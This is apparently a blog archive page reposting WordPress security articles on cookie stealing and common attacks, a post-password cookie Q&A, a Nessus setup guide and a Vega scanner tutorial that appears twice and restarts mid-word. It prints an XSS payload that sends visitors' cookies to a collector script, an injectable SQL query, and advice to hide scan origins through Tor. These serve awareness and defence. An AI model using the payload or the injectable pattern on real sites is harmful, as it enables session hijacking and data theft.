Jan 31, 2020

by Melinda Bartley

Did you know that your website uses cookies to store confidential data? Did you know hackers can easily steal your cookies? This could put your website and visitors at risk!

Cookies store all sorts of information – from ad preferences of a customer to login credentials and credit card information. Cookies are used widely across the internet and it’s scary just how often they get stolen.

If you’re a victim of cookie stealing or session hijacking, the repercussions of it are severe. Not only do you lose revenue and the trust of your visitors but you could also face legal issues and hefty fines!

But not to worry because today, we’re going to take you through everything you need to know to prevent these attacks!

In this guide, we’ll first learn how hackers steal cookies then we’ll go through the preventive measures.

TL;DR

Worried about your WordPress website? You can secure your site right now by installing a Session Hijacking & Cookie Stealing Protection Plugin. It will scan your website regularly and alert you if a hacker injects any malicious code that will enable them to steal cookies. Using the plugin, you can clean up the hack promptly & avoid repercussions.

Table of Content

 What Is Cookie Stealing?

 How Hackers Use Cross-site Scripting (XSS) To Steal Cookies & Hijack Sessions?

 How To Prevent Cookie Stealing And Session Hijacking?

 Steps Website Visitors Can Take Against Cookie Stealing

 

What Is Cookie Stealing?

As much as we wish, cookie stealing isn’t as simple as a child sticking their hand into a cookie jar! It’s a complex process and to understand what is happening, we need to touch upon the basics.

→ What Is A Cookie?

You can think of cookies as tiny bits of data. It stores information about your interaction with a website. For example, an eCommerce site would like to track a customer’s journey – the products searched for, products purchased, items abandoned in the cart, or which pages they visit.

This gives the store analytical information on what customers prefer, which pages are being visited the most, how long users stay on a page, etc. They can then use this information to tailor what’s displayed on the website according to the customer’s preferences.

Cookies give website owners insight into what works and what doesn’t. This helps them determine what they need to change or improve on their site.

Cookies are also used to display relevant ads to users. When you visit websites, you would notice advertisements being displayed.

These ads usually reflect your recent search history. For example, if you searched for ‘laptops’ on Google, you’ll notice that ads on all websites show you ads for dell. These ads are not a part of the website but are handled by services like Google Adsense.

Cookies make things convenient for both the website owner and the user. It can boost engagement and lead to more sales which is great for website owners. As for the buyer, cookies help them get a more personalized experience on a website or see ads that are more relevant.

But there are a lot of drawbacks which we’ll discuss a bit later.

[Back to Top ]

 

→ What Is A Browser Session and Session ID?

When you log into a website, a session between your computer and this website is created.

For example, when you log into Facebook, a session begins. This allows you to keep using Facebook (even if you close and reopen the web browser) until you click on ‘log out’ and end the session.

If the session wasn’t created, you would need to keep logging in every time you wanted new data. For example, if you wanted to leave your Facebook news feed and view a friend’s profile page, you will be logged out of Facebook and would need to enter your credentials again to log in and view the friend’s profile.

 

 

This is why sessions are needed. It keeps you logged in so that you can continue to browse through different web pages and navigate the website.

What’s important to note here is that every session generates a set of cookies. We can call these session cookies. And each session cookie has a unique session ID.

A website uses this ID to authenticate the user and establish a trusted connection.

For example, to log in to Facebook, you need to enter your username and password. Next, a session is created with a unique ID. Any requests you make to the Facebook website will be authenticated with this ID. So, when you want to view a different page, you would be sending a request to the Facebook server to display that page. Facebook verifies the ID and displays the content you wish to see.

Now, hackers can hijack your session and abuse this trusted connection. They can send malicious requests on your behalf. Let’s see how.

[Back to Top ]

 

→ What Are The Security Concerns With Cookies?

When cookies are generated, they can only be viewed by you – the site owner. No other website can view your cookies. They belong solely to you.

But these cookies travel across the internet. They are used by ad services and analytics services. So these cookies bounce around from server to server all across the globe. If the connection is not secure, a hacker can easily intercept and steal these cookies.

Now, you may think that if a hacker manages to get information about your shopping preferences, big deal, right?

The problem is cookies stored more than just information about your shopping preferences. It also stores bank details and personal information such as your shipping address and contact details.

If this kind of information falls into the wrong hands, it can be misused for fraudulent activities.

One of the most common ways hackers steal cookies is if they are using the same wifi as you. This kind of wifi hacking is called man-in-the-middle attacks and can take place only if both are connected to the same wireless network. This is why it’s advised to never use public wifi that is unsecured or used by many. This can also happen to users within the same computer networks.

A few other methods include packet sniffing and by exploiting a vulnerability called cross-site scripting. Today, we’re going to show you in detail how the XSS cookie stealing works.

[Back to Top ]

 

 

How Hackers Use Cross-site Scripting (XSS) To Steal Cookies & Hijack Sessions?

To show you how hackers steal cookies using cross-site scripting (XSS) attacks, we’ll use an example. Let’s assume you visit a website that has a comments section on it.

Any comment you make will be sent to the website’s database. Ideally, this comments section should be configured to accept only text in plain English. But if it accepts special characters as well, this makes it vulnerable to XSS.

A hacker can enter their own malicious codes which will be sent to the database. Once inside, the code will get executed. There are numerous codes hackers can insert into the website to run all sorts of malicious activities like creating a new website admin or stealing cookies.

To steal cookies, a hacker can enter the following code:

Note: This is not a tutorial on how to steal cookies. This article is intended to make website owners aware of how hackers can steal cookies. We do not advise you to carry out any illegal activities.

 

[php]

document.write(‘<img src="http://localhost/submitcookie.php? cookie =’

+ escape(document.cookie) + ‘" />);

[/php]

In the comments section, this code will appear as an image. If you (as a visitor) click on it, you will see an image displayed. But there’s more than just happened.

When you click on the image, this PHP file silently executes the code and grabs your session cookie and the session ID.

Now the hacker can recreate your session and pose as you on that website. They can carry out a multitude of malicious acts. For example, if your cookie contains your credit card or any other payment information, they can make purchases.

Luckily, there are preventive measures to safeguard website owners as well as its visitors from these hacks.

Never click on suspicious links in the comments section of websites and in emails. You could become a victim of cookie theft.Click to Tweet

[Back to Top ]

 

 

How To Prevent Cookie Stealing And Session Hijacking?

There are two parties that play a role in preventing cookie theft and session hijacking – the website owner and the visitor. We’ll discuss preventive measures for both sides.

 Measures Website Owners Can Take Against Cookie Stealing

As a website owner, if you don’t have a security analyst to handle it all for you, you need to implement the following preventive measures:

1. Install an SSL Certificate

Data is transferred constantly between the user’s browser and your web server. Without SSL, this data (cookies) is sent in plain text. If a hacker intercepts this data, they can simply read it. So if it contains login credentials, it will be exposed.

 

 

SSL (Secure Sockets Layer) will encrypt the data before it’s transferred. So even if a hacker manages to steal it, they can’t read the data.

You can get an SSL certificate through your web hosting company or from an SSL provider. You can also get a basic free SSL certificate from Let’s Encrypt.

2. Install a Security Plugin

Keep a WordPress security plugin such as MalCare active on your website. The plugin’s firewall will prevent hack attempts on your website and block malicious IP addresses. Plus, it will scan your site regularly and alert you if any malicious code has been entered by a hacker. You can clean up your website instantly. This will help you detect and delete such hack attempts immediately before they cause any harm.

3. Update Your Website

Always keep your website up to date, this includes the WordPress installation, themes, and plugins. Running on outdated software opens many vulnerable spots on your website that hackers can exploit. Ensure you update your site as and when a new update is available.

 

 

These updates not only carry new features and bug fixes, but they also fix security flaws from time to time.

4. Harden Your Website

WordPress.org recommends certain website hardening measures that you should implement on your website. This includes using strong and unique usernames and strong passwords, blocking PHP execution in unknown folders, disabling the file editor in themes and plugins and more. Now, this may all sound like jargon to you so we’ve created an in-depth step by step guide to WordPress Hardening that you can follow.

[Back to Top ]

 

 

Steps Website Visitors Can Take Against Cookie Stealing

As a website visitor, you don’t have to blindly trust that websites have taken appropriate security measures. You can protect yourself with the following web security protocols.

1. Install an Effective Anti-virus

Ensure the device you’re using to access the internet has anti-malware software installed. This will alert you if malware is detected when you visit a malicious website. It will also remove any malware that you might accidentally download or install on your system.

2. Never Click on Suspicious Links

Hackers target users through the comments section on websites and through emails. Avoid clicking on untrusted links especially ones that lure you with attractive offers or discounts.

3. Avoid Storing Sensitive Data

Storing credit card information on shopping websites makes checkout faster and more convenient. Saving passwords on web browsers like Google Chrome to auto log into websites eliminates the need to remember passwords!

But it all comes with a high risk of being stolen. It’s best to never store sensitive data on websites. It may save you a few seconds, but it also puts you at risk of being attacked.

4. Clear Cookies

You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History > Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.

 

 

Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.

That brings us to an end to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.

This guide from MalCare helped me understand cookie stealing and how to take preventive measures against it. Check it out.Click to Tweet

[Back to Top ]

 

Final Thoughts

As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.

There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.

But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.

An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.


Keep your WordPress site protected with 
MalCare!

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

Are you worried that hackers will attack your WordPress website? We wish we could’ve told you not to worry but the truth is WordPress websites are constantly targeted by hackers. This is mainly on account of its popularity as WordPress powers a third of all the websites on the internet.

While WordPress itself is a secure website building platform, it does not function alone. You need plugins and themes to run a WordPress site. Plugins and themes often develop vulnerabilities which hackers exploit to hack a website.

Once they have access to your website, they run all sorts of malicious activities like stealing sensitive information, defrauding customers and displaying illegal content. Meanwhile, you can be blacklisted by Google,or even get suspended by your webhost. All this leads to a loss of visitors and revenue.

While WordPress developers keep the platform secure as it can be, WordPress site owners also need to take measures on their own. In this article, we discuss the most common attacks on WordPress sites and the preventive measures you can take against them.

TL;DR

If you are worried about hackers attacking your WordPress website, you can take website protection measures immediately. You can install our WordPress security plugin MalCare. It will scan and monitor your site every day and block hackers from trying to break in.

 

 

Why Is WordPress A Popular Target For Hackers?

WordPress is a website building platform that enables anyone to build websites without knowing how to code. Moreover, WordPress is free of cost.

As a result, the platform is powering over 1.3 billion active sites today.

The downside of all this is that WordPress websites are targeted more than websites built on any other platform.

Now there are multiple ways in which hackers can break into your site. We’ve narrowed it down to the 5 most common ones. We’ll explain what happens and how you can protect your WordPress site against it.

 

5 Most Common Attacks on WordPress Websites

1. Vulnerable Plugins and Themes

A WordPress site is created using three elements – the core installation, themes and plugins. All three elements have the potential to make a site vulnerable to hacks.

For many years, there hasn’t been any major vulnerability in the WordPress core. It is maintained by a team of highly experienced and qualified developers. They work hard at ensuring the platform is completely secure so you have nothing to worry about there.

However, WordPress plugins and themes are created by third-party developers and they tend to develop WordPress vulnerabilities quite often.

When developers discover any vulnerability, they promptly fix it and release an updated version.

 

 

You, the site owner, need to update to the latest version and your site will be secure. It’s important to install such security updates immediately. This is because when developers release an update, they also release the reasons for the update. Thus, the vulnerability is announced to the public.

This means hackers now know that a vulnerability exists. They also know that not all site owners update their sites immediately. So once they find out that a plugin or theme is vulnerable, they program bots and scanners to crawl the internet and find sites that are using them. Knowing exactly what the vulnerability is makes it easy for them to exploit and break in.

How to Protect Your site Against Vulnerable Plugin & Themes

    • Only use trusted themes and plugins found in the WordPress repository or marketplaces like ThemeForest and Code Canyon.
    • Check your plugin list regularly and keep only the ones you use. Delete any ones you don’t need or are inactive.
    • Ideally, you should keep only the theme that you are actively using.
    • Never use pirated themes and plugins. They usually contain malware that will infect your website.
    • Ensure you recognise all the plugins and themes on your site. Sometimes hackers install their own plugins and themes that have website backdoors installed. This gives them a secret access to your site.

2. Brute Force Attacks

To login to your WordPress site, you need to enter your login credentials i.e., a username and password.

Many times, WordPress site owners use usernames and passwords that are easy to remember. Many WordPress users retain the default username ‘admin’. Common passwords include ‘password123’ or ‘1234567’.

Hackers are well aware of this and attack the login page of WordPress sites.

 

 

They create a database of commonly used usernames and passwords. Next, they program bots to target WordPress sites and attempt different combinations present in their database.

If your login credentials are weak, the bots have a high chance of guessing it and breaking into your site. This is known as ‘Brute Force Attacks’ and is estimated that they have a 10% success rate!

How to Protect Your site Against Brute Forcing

There are a couple of steps you can take to secure your site against brute force attacks:

    1. By default, your WordPress username is admin. You can change it from admin to something more unique.
    2. Use a strong WordPress password. We suggest using a passphrase in combination with numerals and symbols such as Birdsofafeather123$.
    3. Use unique credentials that you have not used on other websites.
    4. Limit the number of login attempts on your site. This means a WordPress user will have only limited chances to enter the right credentials such as 3 attempts or 5 attempts. After this, they will need to use the ‘forgot password’ option. You can install our MalCare security plugin on your site and it will automatically implement this login protection for you.
    5. Use twofactor authentication wherein a WordPress user has to enter their credentials along with a one-time password that is generated on their smartphones or sent to their registered email address.

3. Injection Attacks

Almost every website has an input field like a contact form, a site search bar, or a comments section that enables visitors to enter data. Some websites also allow visitors to upload documents and image files.

Usually this data is accepted and sent to your database to be processed and stored. These fields need proper configuration to validate and sanitise the data before it goes to your database. This will ensure that only valid data is accepted. If these measures are lacking, hackers exploit it and enter malicious code.

Let’s take an example of a WordPress site that has a contact form on it. Ideally this form should accept a name, an email address, and a phone number.

 

 

    1. The name field should accept only letters of the alphabet.
    2. The email address field should accept a valid email address format such as example@mysite.com.
    3. The phone number field should contain only digits.

Now if these configurations aren’t in place, a hacker can insert malicious scripts such as:

String userLoginQuery = "SELECT user_id, username, password_hash FROM users WHERE username = '" + request.getParameter("user") + "'";

This is a code that’ll command the database to execute certain functions. In this way, hackers are able to run malicious scripts on your site which they can use to gain full control of your site.

The most popular injection attacks on WordPress sites include SQL injection attacks and Cross-Site Scripting.

How to Protect Your Website Against Injection Attacks

    1. Many injection attacks stem from themes and plugins that enable visitor input on your site. We suggest using only trusted themes and plugins. Next, keep your plugins and theme up to date always.
    2. Control field entries and data submissions. This is technical and would require a developer’s assistance.
    3. Use a WordPress firewall. If you’ve installed MalCare on your site, it automatically puts up a robust firewall to defend your site against hackers.

4. Phishing and Data Theft

Visitors interact with your website in different ways. Some of them just read your blog posts, others contact you through your contact from, and so on. If you run an ecommerce site then many visitors buy items from your website. This means they need to log into your website and enter credit card information.

When someone enters credit card information to your site, it transfers and stores the information on your site server. This information can be intercepted while it’s being transferred. Moreover, the credit card data can be stolen.

They may also break into your website and pose as you. They send emails or redirect visitors to other websites and trick them into revealing personal data and payment information.

How To Protect Your Site From Phishing and Data Theft

    1. Use an SSL certificate. This will encrypt the data that’s being transferred from and to your site. Even if a hacker intercepts it, they cannot use it as they won’t be able to decipher it. Refer to our guide on using SSL and HTTPS.
    2. Use a WordPress Security Plugin to receive alerts if there’s any suspicious activity on your website. The plugin will also block hack attempts.

5. Cookie Stealing

Have you noticed that when you log into a site, your browser requests to ‘remember me’ or ‘save password’? This is done so that you don’t have to enter your login credentials every time you want to access a website. You can opt to allow the browser to save your login details.

 

 

Browsers can save such data because of cookies. Cookies are tiny bits of data that record a visitor’s interaction with a website. For instance, if you run an online store, your site might track a customer’s journey such as what product they searched for and what they purchased. This data is used in analytics and also advertisers tailor ads to the visitor’s preference. Now, cookies can also store bank details and personal information.

If a hacker is able to steal your website’s cookies, they can access sensitive data of your business and your visitors. They can exploit this data to carry out their malicious acts such as defrauding customers by using their credit card information.

You can read up more on this in our easy guide to Cookie Stealing and Session Hijacking.

How To Protect Your Site From Cookie Stealing and Session Hijacking

    • Change your WordPress keys and salts regularly. Keys and salts provide secure encryption of the information stored in the browser’s cookies. This measure is technical in nature. We recommend using MalCare’s WordPress hardening feature to change your keys and salts. From the MalCare dashboard, access Security > WordPress hardening > Change WordPress Security Keys and Salts.

 

 

    • Here too, we recommend installing an SSL certificate to protect your website’s data.

That brings us to an end on the most common WordPress Attacks. Before we wrap up, we’d like to show you a few WordPress hardening measures that will make your site stronger against such attacks.

 

How To Harden Your WordPress Site Against Attacks

While you can take specific measures to protect your website against certain attacks, there are some overall security measures you can implement on your site for better protection. These are called WordPress hardening measures. We’ve explained it in brief here, but you can read our in-depth guide on WordPress Hardening for more detailed explanations.

1. Disabling the file editor

WordPress has a feature that enables you to edit theme and plugin files directly from the dashboard. Many website owners don’t need this feature, it is mostly used by developers. But if a hacker breaks into your wp-admin dashboard, they can inject malicious code into your theme and plugin files. Thus, if you don’t need this feature, it can be disabled.

2. Disabling plugin or theme installations

When hackers can access your site, they install their own plugins or themes. These plugins and themes are usually malicious and contain backdoors. This gives hackers a secret entry into your site.

Plus, as we mentioned, vulnerable themes and plugins are a top cause of hacked sites. If you have multiple users on your website, they may install a plugin or theme that isn’t secure. This can open up your site to hackers. If you want to avoid this, you can disable plugin and theme installations on your site.

If you don’t regularly install plugins and themes on your site, you can disable the installation option.

3. Limiting login attempts

As we mentioned before, you can limit the number of chances a WordPress user has to enter the correct login credentials to enter the site. This eliminates the risk of brute force attacks.

4. Changing security keys and salts

Keys and salts encrypt the information stored in your browser. So even if a hacker manages to steal your cookies, they can’t decipher it. However, if a hacker accesses these keys and salts, they can use it to decrypt the cookies. Regularly changing your keys and salts can help avoid cookie theft.

5. Blocking PHP execution in unknown folders

There are only certain files and folders on your WordPress site that execute code. Other folders only store information such as your Uploads folder that stores images and videos.

However, when a hacker gains access to your website, they insert php code into random folders or even create their own folders.

You can block such activity by disabling PHP executions in unknown folders.

Implementing these measures requires technical expertise. We don’t recommend doing it manually. It’s much safer and easier to use a plugin like MalCare that lets you do this in just a few clicks.

 

 

With that, we’re confident your WordPress website is secured and protected against hackers.

 

Final Thoughts

Hackers have a multitude of ways to break into your WordPress site and they come up with new ones ever so often!

You need to take your security measures to protect your website and ensure it’s safe against hack attacks.

We recommend using our MalCare Security Plugin to secure your WordPress site. It will block hackers and malicious bots from accessing your site. You can rest assured your site is being monitored and protected.

Prevent Hacks With our MalCare Security Plugin!

 

The post 5 Most Common WordPress Attacks & How To Prevent Them appeared first on MalCare.

 

Recent Articles By Author

More from Melinda Bartley

*** This is a Security Bloggers Network syndicated blog from MalCare authored by Melinda Bartley. Read the original post at: https://www.malcare.com/blog/wordpress-attacks/

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

I'm using wordpress for a specific client because of their need to edit content themselves. With this, I'm using their page password protection, per client's request. The problem is, it seems that the cookie being set never times out. So, once the client enters the password, nobody ever has to enter the password again through the same browser on the same machine. This leaves it wide open for anybody to walk up to and enter. So, I assume the best way to address this is to set a timeout on the cookie. However, I'm not sure how to do that with the php function. Here's the whole function:

function post_password_required( $post = null ) {
    $post = get_post($post);

    if ( empty( $post->post_password ) )
        return false;

    if ( ! isset( $_COOKIE['wp-postpass_' . COOKIEHASH] ) )
        return true;

    require_once ABSPATH . WPINC . '/class-phpass.php';
    $hasher = new PasswordHash( 8, true );

    $hash = wp_unslash( $_COOKIE[ 'wp-postpass_' . COOKIEHASH ] );
    if ( 0 !== strpos( $hash, '$P$B' ) )
        return true;

    return ! $hasher->CheckPassword( $post->post_password, $hash );
}

Really, I'd like to have the cookie expire when the browser closes, and otherwise every few hours. Any advice on what to add to make the cookie expire after it's set?

I believe it would probably have to be added to this line:

 

$hash = wp_unslash( $_COOKIE[ 'wp-postpass_' . COOKIEHASH ] );

Thanks ahead of time for any advice.

 

 

5

There's a much, much easier way to do this, using the post_password_expires filter. By default, the cookie expires 10 days from creation. To turn this into a session cookie, return 0. The following should be added to your theme's functions.php:

 

function custom_password_cookie_expiry( $expires ) {
    return 0;  // Make it a session cookie
}
add_filter( 'post_password_expires', 'custom_password_cookie_expiry' );

 

 

 

 

https://developer.wordpress.org/reference/hooks/post_password_expires/

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Nessus 는 자동화된 취약점 진단 시스템
개인이 사용할땐 home버전으로 무료로 이용가능 (등록 코드를 얻어야 가능)

Nessus 홈페이지 바로가기

설치 메뉴얼 페이지(영문)

1. 홈페이지 이동



2. Product > Nessus Download



3. Agree 누르고 Kali 리눅스에 다운




4. Nessus 설치 후, 서비스 시작
설치 메뉴얼 페이지(영문)

root@kali:~/Downloads# dpkg -i Nessus-6.5.6-debian6_amd64.deb 
Selecting previously unselected package nessus.
(Reading database ... 298931 files and directories currently installed.)
Preparing to unpack Nessus-6.5.6-debian6_amd64.deb ...
Unpacking nessus (6.5.6) ...
Setting up nessus (6.5.6) ...
Unpacking Nessus Core Components...
nessusd (Nessus) 6.5.6 [build M20049] for Linux
Copyright (C) 1998 - 2015 Tenable Network Security, Inc

Processing the Nessus plugins...
[##################################################]

All plugins loaded (1sec)

 - You can start Nessus by typing /etc/init.d/nessusd start
 - Then go to https://kali:8834/ to configure your scanner

Processing triggers for systemd (228-4) ...
root@kali:~/Downloads# /etc/init.d/nessusd start
Starting Nessus : .



5. 홈페이지 접속
 . https://localhost:8834
 . I Understand the Risks 클릭
 . Add Exception 클릭
 . Confirm Security Exception



6. Contiune 클릭



7. Nessus 서버 로그인용 아이디 생성
 . Kali 리눅스에서 자신이 사용할 아이디 비번 입력




8. Nessus 등록 후, Activation Code 획득
 . http://www.tenable.com/products/nessus-home 등록 후, 메일로 Activation Code 획득



9. Nessus 설치 완료



출처: https://vmos.tistory.com/13 [이것저것]

출처: https://vmos.tistory.com/13 [이것저것]

출처: https://vmos.tistory.com/13 [이것저것]

출처: https://vmos.tistory.com/13 [이것저것]

출처: https://vmos.tistory.com/13 [이것저것]

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

Withstanding an attack from a motivated hacker is one of the most important responsibilities a system administrator must undertake. This is especially true for websites that may contain sensitive customer information and a high volume of users. So it's important for a sysadmin to take proactive measures to find and fix vulnerabilities in their websites.

One tool that can help do this is Vega Vulnerability Scanner, a free, open-source, graphical web-auditing tool developed by the security company Subgraph. This tool contains several interesting features such as a proxy scanner, but we'll be focusing on the automated security testing aspect that can help us find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and many other vulnerabilities.

There are similar web application scanners to Vega. Portswigger's Burp Suite Scanner and Netsparker's Security Scanner both ofter premium vulnerability scanners but Vega's scanner can perform many of the same tasks at no cost. Vega's scanner makes finding and understanding the severity of web application vulnerabilities simple by clearly and concisely displaying useful resources with every scan.

Step 1Install Vega

Since the Vega Vulnerability Scanner usually comes preinstalled on most versions of Kali Linux, you should be good to go if you're using a Kali system. If you're not sure whether or not your Kali setup has it already, you can run the apt-get command seen below in a terminal. You'll get a message saying it's already installed if you do have it already, and if not, it will install it for you.

apt-get update && apt-get install vega

If you're using the BlackArch penetration distribution, you can install the Vega Vulnerability Scanner with the below command. BlackArch doesn't use the APTpackage manager, so we'll use Pacman. I won't be going over any other details in the following steps that cover using BlackArch, but it's a similar process, so it shouldn't be too hard for you to follow along.

pacman -S vega

Step 2Start Vega

In Kali Linux, tools are automatically sorted into categories, so click on "Applications," then hover over the "Web Application Analysis" category, and click on "Vega." Depending on if you're using something like XFCE, a lightweight version of Kali, the Applications menu may look a bit different. You could also just search for "Vega" from the "Show Applications" screen.

Step 3Configure Vega

After starting an application for the first time, I like to view the available preferences and options. In the top-left corner, click on the "Window" menu, then view the "Preferences," which I'll walk you through in the next two steps.

Proxy Vega HTTP Requests (Optional)

If you prefer to anonymize your Vega scans and proxy all connections, check the "Enable SOCKS proxy" option under General, and enter a proxy address and port. If you're using Tor, enter the default Tor address and port (127.0.0.1:9050). This will help conceal the origin of your scans. Otherwise, if you're using a free or premium proxy service, choose the address and port you prefer.

Use Tor's User-Agent (Optional)

If you decide to proxy Vega scans over Tor, you may also consider changing Vega's user-agent to the Tor Browser user-agent. This will help you access some (but not all) websites that block Tor HTTP requests.

To modify the Vega user-agent, click on the "Scanner" category and enter the Tor Browser user-agent next to User-Agent. Then click "Apply" and "OK" to save the changes. Below is the current Tor Browser user-agent as of Feb. 2018.

Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0

The Tor Browser user-agent will change with every major Tor Browser update. To find the latest user-agent, open an up-to-date Tor Browser and enter about:configinto the URL bar. If you see a warning popup, select "I accept the risk," then type useragent.override in the Search bar.

Double-clicking the entry that shows up will prompt a popup and allow you to copy the user-agent string. Alternatively, you can also right-click and select "Copy" on the value.

Moderate HTTP Requests (Optional)

Another thing in the Scanner menu you may want to modify is the Maximum number of requests per second to send option. By default, the software is set to 25 requests per second.

Depending on the scenario, this might be too many or too few requests per second. Assuming you have permission to scan a website with Vega, ten requests per second is probably a good place to start. With sites you own, 100 requests per second might be more appropriate. It's entirely up to you.

You won't notice much increase in processing power using more requests per second, so it's safe to set that number to something high. Don't worry; Vega isn't a DDoS tool. Your internet bandwidth and the bandwidth of the website will automatically throttle the requests.

That's about it for Vega's preferences. The Listener settings in "Proxy" are preferences unrelated to the scanner. The "Debug" preferences in the Scanner section are there for Vega developers.

Step 4Scan a Website with Vega

Now that we have Vega installed and configured, we're now ready to start scanning a website. To start scanning, open the "Scan" menu in the top left and click on "Start New Scan." Vega will prompt us with the Select a Scan Target window. Enter your target URL into the box under Scan Target, then hit "Next."

Vega has dozens of modules designed to find a wide range of common web server vulnerabilities such as SQL, XSS, and XML injection vulnerabilities. If you want to enable all of the scanner modules, just make sure all are selected, and click "Finish" to start scanning the website. Otherwise, deselect the modules you're not interested in testing first.

Note: We don't need to adjust the Authentication Options or Parameters, the next two pages in the options if you keep selecting "Next," so that's why we just select "Finish" after choosing our modules.

A scan can take anywhere from 2 minutes to 8 hours to complete depending on the size of the website and the requests per second we set earlier in the article. You'll know the scan has started when the website appears in the Scan Alerts tab and alerts begin to propagate. When the scan is done running, you'll get a report detailing any vulnerabilities found.

Step 5Interpret Vega's Alerts

When the scan is complete, Vega will clearly and concisely display a summary of the alerts.

If Vega reports a "High" alert, don't panic. Vega's modules are sensitive and sometimes produce false positive alerts for vulnerabilities that may not actually exist. False positives aren't necessarily a bad thing. That being said, it's a good idea to comb through the report and manually investigate each alert. Think of these alerts as areas worth further investigating and not definitive indications that something needs to be fixed.

Vega does a fantastic job of explaining what each alert means, their impact on our websites, and ways to remedy the vulnerabilities. It also includes useful references that may help us better understand how to deal with the vulnerabilities.

Clicking on one of the alerts will display tons of useful information.

Vega Can Help Keep Your Website Secure

Vega is an excellent tool to help security researchers better understand web application penetration testing. Its vast selection of modules allows even novice users to dig deep into potential security risks and assess their severity to websites. Anyone interested in improving the security of their website and enhancing their web hacking skills will come to love Vega aWithstanding an attack from a motivated hacker is one of the most important responsibilities a system administrator must undertake. This is especially true for websites that may contain sensitive customer information and a high volume of users. So it's important for a sysadmin to take proactive measures to find and fix vulnerabilities in their websites.

One tool that can help do this is Vega Vulnerability Scanner, a free, open-source, graphical web-auditing tool developed by the security company Subgraph. This tool contains several interesting features such as a proxy scanner, but we'll be focusing on the automated security testing aspect that can help us find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and many other vulnerabilities.

There are similar web application scanners to Vega. Portswigger's Burp Suite Scanner and Netsparker's Security Scanner both ofter premium vulnerability scanners but Vega's scanner can perform many of the same tasks at no cost. Vega's scanner makes finding and understanding the severity of web application vulnerabilities simple by clearly and concisely displaying useful resources with every scan.

Step 1Install Vega

Since the Vega Vulnerability Scanner usually comes preinstalled on most versions of Kali Linux, you should be good to go if you're using a Kali system. If you're not sure whether or not your Kali setup has it already, you can run the apt-get command seen below in a terminal. You'll get a message saying it's already installed if you do have it already, and if not, it will install it for you.

apt-get update && apt-get install vega

If you're using the BlackArch penetration distribution, you can install the Vega Vulnerability Scanner with the below command. BlackArch doesn't use the APTpackage manager, so we'll use Pacman. I won't be going over any other details in the following steps that cover using BlackArch, but it's a similar process, so it shouldn't be too hard for you to follow along.

pacman -S vega

Step 2Start Vega

In Kali Linux, tools are automatically sorted into categories, so click on "Applications," then hover over the "Web Application Analysis" category, and click on "Vega." Depending on if you're using something like XFCE, a lightweight version of Kali, the Applications menu may look a bit different. You could also just search for "Vega" from the "Show Applications" screen.

Step 3Configure Vega

After starting an application for the first time, I like to view the available preferences and options. In the top-left corner, click on the "Window" menu, then view the "Preferences," which I'll walk you through in the next two steps.

Proxy Vega HTTP Requests (Optional)

If you prefer to anonymize your Vega scans and proxy all connections, check the "Enable SOCKS proxy" option under General, and enter a proxy address and port. If you're using Tor, enter the default Tor address and port (127.0.0.1:9050). This will help conceal the origin of your scans. Otherwise, if you're using a free or premium proxy service, choose the address and port you prefer.

Use Tor's User-Agent (Optional)

If you decide to proxy Vega scans over Tor, you may also consider changing Vega's user-agent to the Tor Browser user-agent. This will help you access some (but not all) websites that block Tor HTTP requests.

To modify the Vega user-agent, click on the "Scanner" category and enter the Tor Browser user-agent next to User-Agent. Then click "Apply" and "OK" to save the changes. Below is the current Tor Browser user-agent as of Feb. 2018.

Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0

The Tor Browser user-agent will change with every major Tor Browser update. To find the latest user-agent, open an up-to-date Tor Browser and enter about:configinto the URL bar. If you see a warning popup, select "I accept the risk," then type useragent.override in the Search bar.

Double-clicking the entry that shows up will prompt a popup and allow you to copy the user-agent string. Alternatively, you can also right-click and select "Copy" on the value.

Moderate HTTP Requests (Optional)

Another thing in the Scanner menu you may want to modify is the Maximum number of requests per second to send option. By default, the software is set to 25 requests per second.

Depending on the scenario, this might be too many or too few requests per second. Assuming you have permission to scan a website with Vega, ten requests per second is probably a good place to start. With sites you own, 100 requests per second might be more appropriate. It's entirely up to you.

You won't notice much increase in processing power using more requests per second, so it's safe to set that number to something high. Don't worry; Vega isn't a DDoS tool. Your internet bandwidth and the bandwidth of the website will automatically throttle the requests.

That's about it for Vega's preferences. The Listener settings in "Proxy" are preferences unrelated to the scanner. The "Debug" preferences in the Scanner section are there for Vega developers.

Step 4Scan a Website with Vega

Now that we have Vega installed and configured, we're now ready to start scanning a website. To start scanning, open the "Scan" menu in the top left and click on "Start New Scan." Vega will prompt us with the Select a Scan Target window. Enter your target URL into the box under Scan Target, then hit "Next."

Vega has dozens of modules designed to find a wide range of common web server vulnerabilities such as SQL, XSS, and XML injection vulnerabilities. If you want to enable all of the scanner modules, just make sure all are selected, and click "Finish" to start scanning the website. Otherwise, deselect the modules you're not interested in testing first.

Note: We don't need to adjust the Authentication Options or Parameters, the next two pages in the options if you keep selecting "Next," so that's why we just select "Finish" after choosing our modules.

A scan can take anywhere from 2 minutes to 8 hours to complete depending on the size of the website and the requests per second we set earlier in the article. You'll know the scan has started when the website appears in the Scan Alerts tab and alerts begin to propagate. When the scan is done running, you'll get a report detailing any vulnerabilities found.

Step 5Interpret Vega's Alerts

When the scan is complete, Vega will clearly and concisely display a summary of the alerts.

